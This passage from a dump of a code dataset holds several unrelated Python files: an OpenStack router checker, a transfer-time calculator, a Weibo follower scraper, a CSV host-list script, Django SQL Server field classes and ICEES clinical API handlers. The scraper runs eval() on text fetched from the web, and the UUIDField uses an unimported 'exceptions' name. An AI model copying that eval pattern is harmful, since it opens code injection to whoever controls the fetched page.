NEUTRON_CLIENT\nfrom netmon.logger.logger import LOG\nfrom netmon.plugins.base_plugin import BasePlugin\n\n\nclass L3Router(BasePlugin):\n \"\"\"Module to check L3 networking configurations.\"\"\"\n\n def __init__(self):\n self.routers = {}\n\n def _router_collector(self):\n l3_agent = NEUTRON_CLIENT.get_l3_agent_on_host()\n if l3_agent:\n l3_agent_id = l3_agent['id']\n else:\n return\n\n self.routers = {\n router['id']: router\n for router\n in NEUTRON_CLIENT.list_routers_on_l3_agent(l3_agent_id)['routers']\n }\n\n def _router_port_collector(self):\n for router_id in self.routers:\n self.routers[router_id]['ports'] = [\n {'id': port['id'],\n 'ip_address': port['fixed_ips'][0]['ip_address'],\n 'subnet_id': port['fixed_ips'][0]['subnet_id']}\n for port in NEUTRON_CLIENT.list_router_interfaces(router_id)\n ]\n\n def _floatingip_collector(self):\n for router_id in self.routers:\n self.routers[router_id]['floatingips'] = {\n fip['id']: fip['floating_ip_address']\n for fip\n in NEUTRON_CLIENT.list_floatingip_by_router(router_id)\n }\n\n def collector(self):\n \"\"\"Data collector\"\"\"\n self._router_collector()\n self._router_port_collector()\n self._floatingip_collector()\n\n def checker(self):\n \"\"\"Checker\"\"\"\n for router, router_setting in self.routers.items():\n LOG.info(\"Checking L3 router %s...\", router,\n extra_empty_line=True)\n router_ns = 'qrouter-' + router\n if router_setting['status'] != 'ACTIVE':\n LOG.danger(\"Router %s is not in active status!\", router)\n continue\n gw_port_id = router_setting.get('gw_port_id')\n if gw_port_id:\n LOG.info(\"Checking gateway port %s of router %s...\",\n gw_port_id, router)\n gw_port = ('qg-' + gw_port_id)[:14]\n checker.check_ovs_port_in_bridge('br-ex', gw_port)\n\n gateway_info = router_setting.get('external_gateway_info')\n external_ips = gateway_info.get('external_fixed_ips', [])\n if not external_ips:\n LOG.danger(\"Router %s has a gateway port without any \"\n \"external IP!\", router)\n else:\n checker.check_router_connection(router, router_ns)\n for fixed_ip in external_ips:\n cidr_addr = NEUTRON_CLIENT.get_cidr_addr(\n fixed_ip['subnet_id'], fixed_ip['ip_address'])\n checker.check_device_ips(gw_port, [cidr_addr],\n namespace=router_ns)\n\n floatingips = router_setting.get('floatingips', {})\n if floatingips:\n LOG.info(\"Checking floating IPs on router %s...\", router)\n for ip_addr in floatingips.values():\n ip_addr += '/32' # Floating IPs\n checker.check_device_ips(gw_port, [ip_addr],\n namespace=router_ns)\n else:\n LOG.caution(\"L3 router %s doesn't have a gateway port!\",\n router)\n\n ports = router_setting.get('ports', [])\n if ports:\n LOG.info(\"Checking router ports on router %s...\", router)\n for port in ports:\n LOG.info(\"Checking router port %s of subnet %s on \"\n \"router %s...\",\n port['id'], port['subnet_id'], router)\n port_device = ('qr-' + port['id'])[:14]\n checker.check_ovs_port_in_bridge('br-int', port_device)\n checker.check_ovs_port_tag('br-int', port_device, 0,\n check_port_dead=True)\n cidr_addr = NEUTRON_CLIENT.get_cidr_addr(\n port['subnet_id'], port['ip_address'])\n checker.check_device_ips(port_device, [cidr_addr],\n namespace=router_ns)\n","sub_path":"netmon/plugins/l3_router.py","file_name":"l3_router.py","file_ext":"py","file_size_in_byte":5112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"112302363","text":"def total_transfer_time (linkLength_km, speedOfLight_kms, processingDelay_s, dataRate_bps, maxUserDataBitsPerPacket_b, overheadBitsPerPacket_b, messageLength_b):\n l = linkLength_km\n c = speedOfLight_kms\n p = processingDelay_s\n r = dataRate_bps\n s = maxUserDataBitsPerPacket_b\n o = overheadBitsPerPacket_b\n m = messageLength_b\n \n transmission_delay = (s + o) / r\n propagation_delay = l / c\n total_time = ((propagation_delay + transmission_delay + p) * 2) + (transmission_delay) * ((m / s) - 1) \n return total_time\n\nprint (\"{:.4f}\".format(total_transfer_time(20000, 200000, 0.001, 1000000, 1000, 100, 5000)))\nprint (total_transfer_time (10000, 200000, 0.001, 1000000, 1000, 100, 1000000000))","sub_path":"lab/total_transfer_time.py","file_name":"total_transfer_time.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"361554892","text":"#! /usr/bin/env python\n#coding=utf-8\n\nimport urllib\nimport urllib2\nimport sys\nimport time\nimport re\nimport socket\nimport json\nfrom bs4 import BeautifulSoup\n\n\nsocket.setdefaulttimeout(60)\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nclass getFollowers:\n charset = 'utf8'\n uid = '';\n path='C:/weibodata'\n pageNum = 0 #关注的人共有多少页\n \n def get_followers(self,uid):\n followerlist=[]\n self.uid = uid\n url = self.get_url(uid)\n req = urllib2.Request(url)\n result = urllib2.urlopen(req)\n text = result.read()\n content = eval(\"u\\\"\\\"\\\" \"+text+\"\\n \\\"\\\"\\\" \").encode(getFollowers.charset)\n self.get_totallPageNum(content)\n i=1\n while iSTK && STK.pageletM && STK.pageletM.view\\((.*?)\\)<\\/script>')\n result = pattern.findall(text)\n jsonResult = json.loads(result[8]) #关注的人信息所在result\n soup = BeautifulSoup(jsonResult['html'])\n try:\n idlist=soup.findAll('a',attrs={'class': \"W_f14 S_func1\"})\n for ids in idlist:\n id=ids['usercard']\n followerlist.append(id)\n except Exception as e:\n pass\n for follower in followerlist:\n self.writefile(self.path+'/'+self.uid+'_follow.txt',follower[3:]+'\\n') \n \n \n def get_totallPageNum(self,content):\n tag1 = ''\n pos1 = content.find(tag1)+len(tag1)\n tag2 = '<\\/strong>'\n pos2 = content.find(tag2,pos1)\n getFollowers.pageNum = int(float(content[pos1:pos2]))\n getFollowers.pageNum = getFollowers.pageNum/20+1\n \n def get_url(self,uid,page=1):\n url = 'http://weibo.com/' + uid + '/follow?page='+str(page)\n return url\n def writefile(self,filename,content):\n fw = file(filename,'a')\n fw.write(content)\n fw.close()\n \n \n","sub_path":"不使用API/pythonspider 单进程完整版/getFollowers.py","file_name":"getFollowers.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"86783087","text":"#ol4.py takes a list of offline computers from a computer lab and compares them with a list of supported computers, returning the list of offline supported comptures only.\n\nimport csv\n\noffline = csv.reader(open('/Users/*YOURNAME*/Desktop/Offline Monday/offline.csv', 'rU'))\nhostnames = csv.reader(open('/Users/*YOURNAME*/Desktop/Offline Monday/supported_host_names.csv', 'rU'))\n\nofflineOne = []\nofflineTwo = []\n\n\ndef get_intersection(offline, hostnames):\n for row in offline:\n offlineOne.append(row[1])\n for row in hostnames:\n offlineTwo.append(row[1])\n out_str = ''\n for e in set(offlineOne).intersection(set(offlineTwo)):\n out_str += str(e) + '\\n'\n return out_str\n\nfinal = get_intersection(offline, hostnames)\n\noutfile = open('offline_out.txt', 'w')\noutfile.write(final)\noutfile.close()\n","sub_path":"ol4.py","file_name":"ol4.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"563389353","text":"import six\nimport uuid\n\nfrom django.core import checks\nfrom django.core.files.base import ContentFile, File\nfrom django.db import models\nfrom django.utils.six import with_metaclass\n\nfrom sql_filestream.win32_streaming_api import StreamingAPIFileDescriptor\n\n\nclass FileStreamDataField(with_metaclass(models.SubfieldBase, models.BinaryField)):\n\n description = 'Field that maps to a SQL Server FILESTREAM column'\n unallowed_parameters = ['primary_key', 'upload_to', 'storage']\n\n def __init__(self, **kwargs):\n self.identifier_column = kwargs.get('identifier_column', 'doc_id')\n for arg in self.unallowed_parameters:\n setattr(self, '_%s_in_kwargs' % arg, arg in kwargs)\n super(FileStreamDataField, self).__init__(**kwargs)\n\n def check(self, **kwargs):\n errors = super(FileStreamDataField, self).check(**kwargs)\n errors.extend(self._check_unallowed_parameters())\n return errors\n\n def _check_unallowed_parameters(self):\n errors = []\n for arg in self.unallowed_parameters:\n if getattr(self, '_%s_in_kwargs' % arg):\n errors.append(\n checks.Error(\n \"'%s' is not a valid argument for a %s.\" %\n (arg, self.__class__.__name__),\n obj=self\n )\n )\n return errors\n\n def _get_identifier_column(self):\n return self.identifier_column\n\n def db_type(self, connection):\n if connection.settings_dict['ENGINE'] == 'sqlserver_ado':\n return ('varbinary(max) FILESTREAM UNIQUE NONCLUSTERED ([%s] ASC)' %\n self.identifier_column)\n raise NotImplementedError('FileStreamField can only be used with '\n 'sqlserver_ado database engine')\n\n def get_db_prep_value(self, value, connection, prepared=False):\n if isinstance(value, ContentFile):\n value = buffer(value.read())\n return super(FileStreamDataField, self).get_db_prep_value(value, connection,\n prepared)\n\n def to_python(self, value):\n if isinstance(value, ContentFile):\n return value\n return ContentFile(super(FileStreamDataField, self).to_python(value))\n\n\nclass FileStreamField(object):\n\n description = 'Virtual field to interact with the Win32 Streaming API'\n\n def __init__(self, uuid_field='file_id', fs_field='file_content'):\n self.uuid_field = uuid_field\n self.fs_field = fs_field\n self.editable = False\n self.rel = None\n self.column = None\n self._fd = None\n\n def contribute_to_class(self, cls, name):\n self.name = name\n self.model = cls\n cls._meta.add_virtual_field(self)\n setattr(cls, name, self)\n self.descriptor = None\n\n def __get__(self, instance, cls=None):\n if instance is None:\n return self\n if not instance.pk:\n return None\n if not self._fd:\n self._fd = StreamingAPIFileDescriptor(self, instance)\n return self._fd\n\n def __set__(self, instance, content):\n if not (isinstance(content, File) and content.closed == False):\n raise TypeError(\"'%s' must be an opened File instance.\"\n % self.name)\n if not instance.pk:\n # This means that the instance has not been saved to the database yet\n # In this case we cannot use the Win32 Streaming API to save the file\n raise IOError(\"Cannot write file via Streaming API for this instance, as \"\n \"it has not been saved to the database yet.\")\n if not self._fd:\n self._fd = self.__get__(instance)\n with self._fd.open('wb') as f:\n for chunk in content:\n f.write(chunk)\n\n\n# UUIDField has been added since Django 1.8 but is not supported yet by django-mssql\n# So we create it here. The field maps to a SQL Server UNIQUEIDENTIFIER column\n# Adapted from https://github.com/django/django/blob/master/django/db/models/fields/__init__.py#L2351\nclass UUIDField(with_metaclass(models.SubfieldBase, models.Field)):\n default_error_messages = {\n 'invalid': \"'%(value)s' is not a valid UUID.\",\n }\n description = 'Universally unique identifier'\n empty_strings_allowed = False\n\n def __init__(self, verbose_name=None, **kwargs):\n kwargs['max_length'] = 32\n super(UUIDField, self).__init__(verbose_name, **kwargs)\n\n def deconstruct(self):\n name, path, args, kwargs = super(UUIDField, self).deconstruct()\n del kwargs['max_length']\n return name, path, args, kwargs\n\n def get_internal_type(self):\n return \"UUIDField\"\n\n def db_type(self, connection):\n return 'uniqueidentifier ROWGUIDCOL'\n\n def get_placeholder(self, value, connection):\n return 'CAST (%s as UNIQUEIDENTIFIER)'\n\n def get_db_prep_value(self, value, connection, prepared=False):\n if isinstance(value, uuid.UUID):\n return str(value)\n return value\n\n def to_python(self, value):\n if value and not isinstance(value, uuid.UUID):\n try:\n return uuid.UUID(value)\n except ValueError:\n raise exceptions.ValidationError(\n self.error_messages['invalid'],\n code='invalid',\n params={'value': value},\n )\n return value\n","sub_path":"sql_filestream/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":4942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"324740614","text":"\"\"\"ICEES API handlers.\"\"\"\nfrom collections import defaultdict\nimport copy\nimport os\nimport json\nfrom typing import Dict, Union, Optional\n\nfrom fastapi import APIRouter, Body, Depends, Security, HTTPException\nfrom fastapi.security.api_key import APIKeyQuery, APIKeyCookie, APIKeyHeader, APIKey\nfrom reasoner_pydantic import Query, Message\nfrom sqlalchemy.sql.expression import table\nfrom starlette.status import HTTP_403_FORBIDDEN\n\nfrom .dependencies import get_db\nfrom .features import knowledgegraph, sql\nfrom .features.identifiers import get_identifiers, input_dict\nfrom .features.qgraph_utils import normalize_qgraph\nfrom .features.sql import validate_range, validate_feature_value_in_table_column_for_equal_operator\nfrom .features.mappings import mappings, correlations\nfrom .features.config import get_config_path\nfrom .models import (\n Features,\n FeatureAssociation, FeatureAssociation2,\n AllFeaturesAssociation, AllFeaturesAssociation2,\n AddNameById,\n)\nfrom .utils import to_qualifiers, to_qualifiers2, associations_have_feature_matrices\n\n\nAPI_KEY = os.environ.get(\"API_KEY\")\nAPI_KEY_NAME = os.environ.get(\"API_KEY_NAME\")\nCOOKIE_DOMAIN = os.environ.get(\"COOKIE_DOMAIN\")\nTABLES = (\"patient\", \"visit\")\n\n\ndef validate_table(table_name):\n \"\"\"Validate table name.\"\"\"\n if table_name not in TABLES:\n raise HTTPException(400, f\"Invalid table '{table_name}'\")\n\n\nif API_KEY is None:\n async def get_api_key():\n return None\nelse:\n api_key_query = APIKeyQuery(name=API_KEY_NAME, auto_error=False)\n api_key_header = APIKeyHeader(name=API_KEY_NAME, auto_error=False)\n api_key_cookie = APIKeyCookie(name=API_KEY_NAME, auto_error=False)\n\n async def get_api_key(\n api_key_query: str = Security(api_key_query),\n api_key_header: str = Security(api_key_header),\n api_key_cookie: str = Security(api_key_cookie),\n ):\n\n if api_key_query == API_KEY:\n return api_key_query\n elif api_key_header == API_KEY:\n return api_key_header\n elif api_key_cookie == API_KEY:\n return api_key_cookie\n else:\n raise HTTPException(\n status_code=HTTP_403_FORBIDDEN, detail=\"Could not validate credentials\"\n )\n\n \nROUTER = APIRouter()\n\n\n@ROUTER.post(\"/{table}/cohort\", response_model=Dict)\ndef discover_cohort(\n table: str,\n req_features: Features = Body(..., example={}),\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Cohort discovery.\"\"\"\n validate_table(table)\n cohort_id, size = sql.get_ids_by_feature(\n conn,\n table,\n None,\n req_features,\n )\n\n if size == -1:\n return_value = (\n \"Input features invalid or cohort ≤10 patients. \"\n \"Please try again.\"\n )\n else:\n return_value = {\n \"cohort_id\": cohort_id,\n \"size\": size\n }\n return {\"return value\": return_value}\n\n\n@ROUTER.get(\n \"/{table}/cohort/dictionary\",\n response_model=Dict,\n)\ndef dictionary(\n table: str,\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Get cohort dictionary.\"\"\"\n validate_table(table)\n return_value = sql.get_cohort_dictionary(conn, table, None)\n return {\"return value\": return_value}\n\n\n@ROUTER.put(\"/{table}/cohort/{cohort_id}\", response_model=Dict)\ndef edit_cohort(\n table: str,\n cohort_id: str,\n req_features: Features = Body(..., example={}),\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Cohort discovery.\"\"\"\n validate_table(table)\n cohort_id, size = sql.select_cohort(\n conn,\n table,\n None,\n req_features,\n cohort_id,\n )\n\n if size == -1:\n return_value = (\n \"Input features invalid or cohort ≤10 patients. \"\n \"Please try again.\"\n )\n else:\n return_value = {\n \"cohort_id\": cohort_id,\n \"size\": size\n }\n return {\"return value\": return_value}\n\n\n@ROUTER.get(\"/{table}/cohort/{cohort_id}\", response_model=Dict)\ndef get_cohort(\n table: str,\n cohort_id: str,\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Get definition of a cohort.\"\"\"\n validate_table(table)\n cohort_features = sql.get_cohort_by_id(\n conn,\n table,\n None,\n cohort_id,\n )\n\n if cohort_features is None:\n return_value = \"Input cohort_id invalid. Please try again.\"\n else:\n return_value = cohort_features\n return {\"return value\": return_value}\n\n\nwith open(\"examples/feature_association.json\") as stream:\n FEATURE_ASSOCIATION_EXAMPLE = json.load(stream)\n\n\n@ROUTER.post(\n \"/{table}/cohort/{cohort_id}/feature_association\",\n response_model=Dict,\n)\ndef feature_association(\n table: str,\n cohort_id: str,\n year: Optional[str] = None,\n obj: FeatureAssociation = Body(\n ...,\n example=FEATURE_ASSOCIATION_EXAMPLE,\n ),\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Hypothesis-driven 2 x 2 feature associations.\n\n Users select a predefined cohort and two feature variables, and the service\n returns a 2 x 2 feature table with a correspondingChi Square statistic and\n P value.\n \"\"\"\n validate_table(table)\n feature_a = to_qualifiers(obj[\"feature_a\"])\n feature_b = to_qualifiers(obj[\"feature_b\"])\n try:\n validate_feature_value_in_table_column_for_equal_operator(conn, table, feature_a)\n validate_feature_value_in_table_column_for_equal_operator(conn, table, feature_b)\n except RuntimeError as ex:\n return {\"return value\": str(ex)}\n\n cohort_meta = sql.get_features_by_id(conn, table, cohort_id)\n\n if cohort_meta is None:\n return_value = \"Input cohort_id invalid. Please try again.\"\n else:\n cohort_features, cohort_year = cohort_meta\n return_value = sql.select_feature_matrix(\n conn,\n table,\n year,\n cohort_features,\n cohort_year,\n feature_a,\n feature_b,\n )\n if not return_value['feature_matrix']:\n return_value = \"Empty query result returned. Please try again\"\n return {\"return value\": return_value}\n\n\nwith open(\"examples/feature_association2.json\") as stream:\n FEATURE_ASSOCIATION2_EXAMPLE = json.load(stream)\n\n\n@ROUTER.post(\n \"/{table}/cohort/{cohort_id}/feature_association2\",\n response_model=Dict,\n)\ndef feature_association2(\n table: str,\n cohort_id: str,\n year: Optional[str] = None,\n obj: FeatureAssociation2 = Body(\n ...,\n example=FEATURE_ASSOCIATION2_EXAMPLE,\n ),\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Hypothesis-driven N x N feature associations.\n\n Users select a predefined cohort, two feature variables, and bins, which\n can be combined, and the service returns a N x N feature table with a\n corresponding Chi Square statistic and P value.\n \"\"\"\n validate_table(table)\n feature_a = to_qualifiers2(obj[\"feature_a\"])\n feature_b = to_qualifiers2(obj[\"feature_b\"])\n try:\n validate_feature_value_in_table_column_for_equal_operator(conn, table, feature_a)\n validate_feature_value_in_table_column_for_equal_operator(conn, table, feature_b)\n except RuntimeError as ex:\n return {\"return value\": str(ex)}\n\n to_validate_range = obj.get(\"check_coverage_is_full\", False)\n if to_validate_range:\n validate_range(conn, table, feature_a)\n validate_range(conn, table, feature_b)\n\n cohort_meta = sql.get_features_by_id(conn, table, cohort_id)\n\n if cohort_meta is None:\n return_value = \"Input cohort_id invalid. Please try again.\"\n else:\n cohort_features, cohort_year = cohort_meta\n return_value = sql.select_feature_matrix(\n conn,\n table,\n year,\n cohort_features,\n cohort_year,\n feature_a,\n feature_b,\n )\n if not return_value['feature_matrix']:\n return_value = \"Empty query result returned. Please try again\"\n\n return {\"return value\": return_value}\n\n\nwith open(\"examples/associations_to_all_features.json\") as stream:\n ASSOCIATIONS_TO_ALL_FEATURES_EXAMPLE = json.load(stream)\n\n\n@ROUTER.post(\n \"/{table}/cohort/{cohort_id}/associations_to_all_features\",\n response_model=Dict,\n)\ndef associations_to_all_features(\n table: str,\n cohort_id: str,\n year: Optional[str] = None,\n obj: AllFeaturesAssociation = Body(\n ...,\n example=ASSOCIATIONS_TO_ALL_FEATURES_EXAMPLE,\n ),\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Exploratory 1 X N feature associations.\n\n Users select a predefined cohort and a feature variable of interest, and\n the service returns a 1 x N feature table with corrected Chi Square\n statistics and associated P values.\n \"\"\"\n validate_table(table)\n feature = to_qualifiers(obj[\"feature\"])\n try:\n validate_feature_value_in_table_column_for_equal_operator(conn, table, feature)\n except RuntimeError as ex:\n return {\"return value\": str(ex)}\n\n maximum_p_value = obj.get(\"maximum_p_value\", 1)\n correction = obj.get(\"correction\")\n return_value = sql.select_associations_to_all_features(\n conn,\n table,\n year,\n cohort_id,\n feature,\n maximum_p_value,\n correction=correction,\n )\n\n if associations_have_feature_matrices(return_value):\n return {\"return value\": return_value}\n else:\n return {\"return value\": \"Empty query result returned. Please try again\"}\n\n\nwith open(\"examples/associations_to_all_features2.json\") as stream:\n ASSOCIATIONS_TO_ALL_FEATURES2_EXAMPLE = json.load(stream)\n\n\n@ROUTER.post(\n \"/{table}/cohort/{cohort_id}/associations_to_all_features2\",\n response_model=Dict,\n)\ndef associations_to_all_features2(\n table: str,\n cohort_id: str,\n year: Optional[str] = None,\n obj: AllFeaturesAssociation2 = Body(\n ...,\n example=ASSOCIATIONS_TO_ALL_FEATURES2_EXAMPLE,\n ),\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Exploratory 1 X N feature associations.\n\n Users select a predefined cohort and a feature variable of interest and\n bins, which can be combined, and the service returns a 1 x N feature table\n with corrected Chi Square statistics and associated P values.\n \"\"\"\n validate_table(table)\n feature = to_qualifiers2(obj[\"feature\"])\n try:\n validate_feature_value_in_table_column_for_equal_operator(conn, table, feature)\n except RuntimeError as ex:\n return {\"return value\": str(ex)}\n\n to_validate_range = obj.get(\"check_coverage_is_full\", False)\n if to_validate_range:\n validate_range(conn, table, feature)\n maximum_p_value = obj[\"maximum_p_value\"]\n correction = obj.get(\"correction\")\n return_value = sql.select_associations_to_all_features(\n conn,\n table,\n year,\n cohort_id,\n feature,\n maximum_p_value,\n correction=correction,\n )\n if associations_have_feature_matrices(return_value):\n return {\"return value\": return_value}\n else:\n return {\"return value\": \"Empty query result returned. Please try again\"}\n\n\n@ROUTER.get(\n \"/{table}/cohort/{cohort_id}/features\",\n response_model=Dict,\n)\ndef features(\n table: str,\n cohort_id: str,\n year: Optional[str] = None,\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Feature-rich cohort discovery.\n\n Users select a predefined cohort as the input parameter, and the service\n returns a profile of that cohort in terms of all feature variables.\n \"\"\"\n validate_table(table)\n cohort_meta = sql.get_features_by_id(conn, table, cohort_id)\n if cohort_meta is None:\n return_value = \"Input cohort_id invalid. Please try again.\"\n else:\n cohort_features, cohort_year = cohort_meta\n return_value = sql.get_cohort_features(\n conn,\n table,\n year,\n cohort_features,\n cohort_year,\n )\n\n return {\"return value\": return_value}\n\n\n@ROUTER.get(\n \"/{table}/{feature}/identifiers\",\n response_model=Dict,\n)\ndef identifiers(\n table: str,\n feature: str,\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Feature identifiers.\"\"\"\n validate_table(table)\n return_value = {\n \"identifiers\": get_identifiers(table, feature)\n }\n return {\"return value\": return_value}\n\n\n@ROUTER.get(\n \"/{table}/name/{name}\",\n response_model=Dict,\n)\ndef get_name(\n table: str,\n name: str,\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Return cohort id associated with name.\"\"\"\n validate_table(table)\n return_value = sql.get_id_by_name(conn, table, name)\n return {\"return value\": return_value}\n\n\n@ROUTER.post(\n \"/{table}/name/{name}\",\n response_model=Dict,\n)\ndef post_name(\n table: str,\n name: str,\n obj: AddNameById,\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Associate name with cohort id.\"\"\"\n validate_table(table)\n return_value = sql.add_name_by_id(\n conn,\n table,\n name,\n obj[\"cohort_id\"],\n )\n return {\"return value\": return_value}\n\n\nwith open(\"examples/knowledge_graph.json\") as stream:\n KNOWLEDGE_GRAPH_EXAMPLE = json.load(stream)\n\n\n@ROUTER.post(\n \"/knowledge_graph\",\n response_model=Union[Message, Dict],\n)\ndef knowledge_graph(\n obj: Query = Body(..., example=KNOWLEDGE_GRAPH_EXAMPLE),\n reasoner: bool = False,\n verbose: bool = False,\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Query for knowledge graph associations between concepts.\"\"\"\n return_value = knowledgegraph.get(conn, obj, verbose=verbose)\n\n return_value = {\n \"message\": {\n \"query_graph\": return_value.pop(\"query_graph\"),\n \"knowledge_graph\": return_value.pop(\"knowledge_graph\"),\n \"results\": return_value.pop(\"results\"),\n },\n **return_value,\n }\n if reasoner:\n return return_value\n return {\"return value\": return_value}\n\n\n@ROUTER.get(\n \"/knowledge_graph/schema\",\n response_model=Dict,\n)\ndef knowledge_graph_schema(\n reasoner: bool = False,\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Query the ICEES clinical reasoner for knowledge graph schema.\"\"\"\n return_value = knowledgegraph.get_schema()\n if reasoner:\n return return_value\n return {\"return value\": return_value}\n\n\n@ROUTER.get(\n \"/meta_knowledge_graph\",\n tags=[\"trapi\"],\n)\ndef predicates(\n api_key: APIKey = Depends(get_api_key),\n):\n \"\"\"Get meta-knowledge graph.\"\"\"\n all_categories = set()\n id_prefixes = defaultdict(set)\n for feature in mappings:\n categories = mappings[feature][\"categories\"]\n all_categories.update(categories)\n identifiers = input_dict[\"patient\"][feature]\n for category in categories:\n for identifier in identifiers:\n id_prefixes[category].add(identifier.split(\":\")[0])\n id_prefixes = {\n key: list(value)\n for key, value in id_prefixes.items()\n }\n return {\n \"nodes\": {\n category: {\"id_prefixes\": prefixes}\n for category, prefixes in id_prefixes.items()\n },\n \"edges\": [\n {\n \"subject\": sub,\n \"object\": obj,\n \"predicate\": \"biolink:correlated_with\",\n }\n for sub in all_categories for obj in all_categories\n ] + [\n {\n \"subject\": sub,\n \"object\": obj,\n \"predicate\": \"biolink:has_real_world_evidence_of_association_with\",\n }\n for sub in all_categories for obj in all_categories\n ],\n }\n\n\nwith open(\"examples/knowledge_graph_overlay.json\") as stream:\n KG_OVERLAY_EXAMPLE = json.load(stream)\n\n\n@ROUTER.post(\n \"/knowledge_graph_overlay\",\n response_model=Union[Message, Dict],\n)\ndef knowledge_graph_overlay(\n obj: Query = Body(..., example=KG_OVERLAY_EXAMPLE),\n reasoner: bool = False,\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Query for knowledge graph co-occurrence overlay.\"\"\"\n return_value = knowledgegraph.co_occurrence_overlay(\n conn,\n obj,\n )\n\n return_value = {\n \"message\": {\n \"query_graph\": obj[\"message\"].get(\"query_graph\", None),\n \"knowledge_graph\": return_value.pop(\"knowledge_graph\"),\n \"results\": obj[\"message\"].get(\"results\", None),\n },\n **return_value,\n }\n if reasoner:\n return return_value\n return {\"return value\": return_value}\n\n\nwith open(\"examples/knowledge_graph_one_hop.json\") as stream:\n KG_ONEHOP_EXAMPLE = json.load(stream)\n\n\ndef knowledge_graph_one_hop(\n obj: Query = Body(..., example=KG_ONEHOP_EXAMPLE),\n reasoner: bool = True,\n verbose: bool = False,\n conn=Depends(get_db),\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Query the ICEES clinical reasoner for knowledge graph one hop.\"\"\"\n if obj.get(\"workflow\", [{\"id\": \"lookup\"}]) != [{\"id\": \"lookup\"}]:\n raise HTTPException(400, \"The only supported workflow is a single 'lookup' operation\")\n return_value = knowledgegraph.one_hop(conn, obj, verbose=verbose)\n\n return_value = {\n \"message\": {\n \"query_graph\": return_value.pop(\"query_graph\"),\n \"knowledge_graph\": return_value.pop(\"knowledge_graph\", None),\n \"results\": return_value.pop(\"results\", None),\n },\n \"workflow\": [\n {\"id\": \"lookup\"},\n ],\n **return_value,\n }\n if reasoner:\n return return_value\n return {\"return value\": return_value}\n\n\nROUTER.post(\n \"/knowledge_graph_one_hop\",\n response_model=Dict,\n deprecated=True,\n)(knowledge_graph_one_hop)\n\n\nfeature_to_curies = {\n feature: value[\"identifiers\"]\n for feature, value in mappings.items()\n}\n\nfeature_to_categories = {\n feature: value[\"categories\"]\n for feature, value in mappings.items()\n}\n\ncurie_to_features = defaultdict(list)\nfor feature, value in mappings.items():\n for identifier in value[\"identifiers\"]:\n curie_to_features[identifier].append(feature)\n\ncategory_to_features = defaultdict(list)\nfor feature, value in mappings.items():\n for category in value[\"categories\"]:\n category_to_features[category].append(feature)\n\n\ndef features_from_node(source_node):\n return [\n feature\n for curie in source_node[\"ids\"]\n for feature in curie_to_features[curie]\n ] if source_node.get(\"ids\") is not None else [\n feature\n for category in source_node[\"categories\"]\n for feature in category_to_features[category]\n ]\n\n\n# feature_names = correlations[0][1:]\n# correlations = [row[1:] for row in correlations[1:]]\n# correlations = {\n# tuple(sorted((feature_names[irow], feature_names[icol]))): float(correlations[irow][icol])\n# for irow in range(0, len(correlations))\n# for icol in range(irow + 1, len(correlations))\n# }\n\n\ndef knode(source_feature):\n source_curies = feature_to_curies[source_feature]\n source_id, source_synonyms = knowledgegraph.gen_node_id_and_equivalent_ids(source_curies)\n source_categories = feature_to_categories[source_feature]\n return source_id, {\n \"name\": source_feature,\n \"attributes\": [\n {\n \"attribute_type_id\": \"biolink:synonym\",\n \"value\": source_synonyms,\n }\n ],\n \"categories\": source_categories,\n }\n\n\ndef query(\n obj: Query = Body(..., example=KG_ONEHOP_EXAMPLE),\n) -> Dict:\n \"\"\"Solve a one-hop TRAPI query.\"\"\"\n if obj.get(\"workflow\", [{\"id\": \"lookup\"}]) != [{\"id\": \"lookup\"}]:\n raise HTTPException(400, \"The only supported workflow is a single 'lookup' operation\")\n qgraph = copy.deepcopy(obj[\"message\"][\"query_graph\"])\n normalize_qgraph(qgraph)\n if len(qgraph[\"nodes\"]) != 2:\n raise NotImplementedError(\"Number of nodes in query graph must be 2\")\n if len(qgraph[\"edges\"]) != 1:\n raise NotImplementedError(\"Number of edges in query graph must be 1\")\n qedge_id, qedge = next(iter(qgraph[\"edges\"].items()))\n if (\n \"biolink:correlated_with\" not in qedge[\"predicates\"] and\n \"biolink:has_real_world_evidence_of_association_with\" not in qedge[\"predicates\"]\n ):\n return {\n \"message\": {\n \"query_graph\": qgraph,\n \"knowledge_graph\": {\"nodes\": {}, \"edges\": {}},\n \"results\": [],\n }\n }\n\n source_qid = qedge[\"subject\"]\n source_qnode = qgraph[\"nodes\"][source_qid]\n target_qid = qedge[\"object\"]\n target_qnode = 